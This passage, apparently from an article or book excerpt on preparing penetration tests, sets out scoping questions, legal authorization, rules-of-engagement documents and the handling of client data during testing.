the IP ranges that you are allowed to test against? There are laws against scanning and testing systems without proper permissions. Be extremely diligent when ensuring that these devices and ranges actually belong to your client or you may be in danger of facing legal ramifications. What are the physical locations of the company? This is more valuable to you as a tester if social engineering is permitted because it ensures that you are at the sanctioned buildings when testing. If time permits, you should let your clients know if you were able to access any of this information publicly in case they were under the impression that their locations were secret or difficult to find. What to do if there is a problem or if the initial goal of the test has been reached. Will you continue to test to find more entries or is the testing over? This part is critical and ties into the question of why the customer wants a penetration test in the first place. Are there legal implications that you need to be aware of such as systems that are in different countries, and so on? Not all countries have the same laws when it comes to penetration testing. Will additional permission be required once a vulnerability has been exploited? This is important when performing tests on segmented networks. The client may not be aware that you can use internal systems as pivot points to delve deeper within their network. How are databases to be handled? Are you allowed to add records, users, and so on? This listing is not all-inclusive and you may need to add items to the list depending on the requirements of your clients. Much of this data can be gathered directly from the client, but some will have to be handled by your team. If there are legal concerns, it is recommended that you seek legal counsel to ensure you fully understand the implications of your testing. It is better to have too much information than not enough, once the time comes to begin testing. In any case, you should always verify for yourself that the information you have been given is accurate. You do not want to find out that the systems you have been accessing do not actually fall under the authority of the client! It is of utmost importance to gain proper authorization in writing before accessing any of your clients systems. Failure to do so may result in legal action and possibly jail. Use proper judgment! You should also consider that errors and omissions insurance is a necessity when performing penetration testing. Setting limits–nothing lasts forever Setting proper limitations is essential if you want to be successful at performing penetration testing. Your clients need to understand the full ramifications involved, and should be made aware of any residual costs incurred, if additional services beyond those listed within the contract are needed. Be sure to set defined start and end dates for your services. Clearly define the rules of engagement and include IP ranges, buildings, hours, and so on that may need to be tested. If it is not in your rules of engagement documentation, it should not be tested. Meetings should be predefined prior to the start of testing, and the customer should know exactly what your deliverables will be. Rules of engagement documentation Every penetration test will need to start with a rules of engagement document that all involved parties must have. This document should at a minimum cover several items: Proper permissions by appropriate personnel. Begin and end dates for your testing. The type of testing that will be performed. Limitations of testing. What type of testing is permitted? DDOS? Full penetration? Social engineering? These questions need to be addressed in detail. Can intrusive tests as well as unobtrusive testing be performed? Does your client expect cleanup to be performed afterwards or is this a stage environment that will be completely rebuilt after testing has been completed? IP ranges and physical locations to be tested. How the report will be transmitted at the end of the test? (Use secure means of transmission!) Which tools will be used during the test? Do not limit yourself to only one specific tool; it may be beneficial to provide a list of the primary toolset to avoid confusion in the future. For example, we will use the tools found in the most recent edition of the Kali Suite. Let your client know how any illegal data that is found during testing would be handled: law enforcement should be contacted prior to the client. Please be sure to understand fully the laws in this regard before conducting your test. How sensitive information will be handled: you should not be downloading sensitive customer information; there are other methods of proving that the clients' data is not secured. This is especially important when regulated data is a concern. Important contact information for both your team and for the key employees of the company you are testing. An agreement of what you will do to ensure the customer's system information does not remain on unsecured laptops and desktops used during testing. Will you need to properly scrub your machine after this testing? What do you plan to do with the information you gathered? Is it to be kept somewhere for future testing? Make sure this has been addressed before you start testing, not after. The rules of engagement should contain all the details that are needed to determine the scope of the assessment. Any questions should have been answered prior to drafting your rules of engagement to ensure there are no misunderstandings once the time comes to test. Your team members need to keep a copy of this signed document on their person at all times when performing the test. Imagine you have been hired to assert the security posture of a client's wireless network and you are stealthily creeping along the parking lot on private property with your gigantic directional Wi-Fi antenna and a laptop. If someone witnesses you in this act, they will probably be concerned and call the authorities. You will need to have something on you that documents you have a legitimate reason to be there. This is one time where having the contact information of the business leaders that hired you will come in extremely handy! Summary In this article, we focused on all that is necessary to prepare and plan for a successful penetration test. We discussed the differences between penetration testing and vulnerability assessments. The steps involved with proper scoping were detailed, as were the necessary steps to ensure all information has been gathered prior to testing. One thing to remember is that proper scoping and planning is just as important as ensuring you test against the latest and greatest vulnerabilities. Resources for Article: Further resources on this subject: Penetration Testing[article] Penetration Testing and Setup[article] BackTrack 4: Security with Penetration Testing Methodology[article]
Read more
  • 0
  • 0
  • 2772